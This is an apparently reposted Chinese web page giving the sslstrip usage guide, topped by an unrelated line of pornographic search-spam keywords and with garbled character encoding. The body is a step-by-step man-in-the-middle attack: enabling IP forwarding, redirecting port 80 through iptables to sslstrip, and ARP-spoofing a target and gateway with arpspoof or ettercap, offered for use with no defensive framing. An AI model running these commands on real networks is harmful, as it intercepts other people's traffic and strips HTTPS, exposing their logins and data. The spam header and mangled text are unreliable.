亚洲日本免费-啊轻点灬太粗太长了三男一女-麻豆av电影在线观看-日韩一级片毛片|www.grbbt.com

SSLSTrip--Usage

  內(nèi)容來自網(wǎng)絡(luò)加上自己的一點(diǎn)編輯,

  Requirements:

  Python >= 2.5 (apt-get install python)

  The python "twisted-web" module (apt-get install python-twisted-web)

  Setup:

  tar zxvf sslstrip-0.9.tar.gz

  cd sslstrip-0.9

  (optional)

  sudo python ./setup.py install

  Running sslstrip:

  Flip your machine into forwarding mode.

  echo "1" > /proc/sys/net/ipv4/ip_forward

  Setup iptables to redirect HTTP traffic to sslstrip.

  iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port <listenPort>

  Run sslstrip.

  sslstrip.py -l <listenPort>

  Run arpspoof to convince a network they should send their traffic to you.

  arpspoof -i <interface> -t <targetIP> <gatewayIP>或者是換成ettercap

  ettercap –T –q –M arp:remote /要欺騙IP/ /網(wǎng)關(guān)路由/

  That should do it.

 

上一篇:安卓防火墻 PS DroidWall

下一篇:kali系統(tǒng)網(wǎng)絡(luò)設(shè)置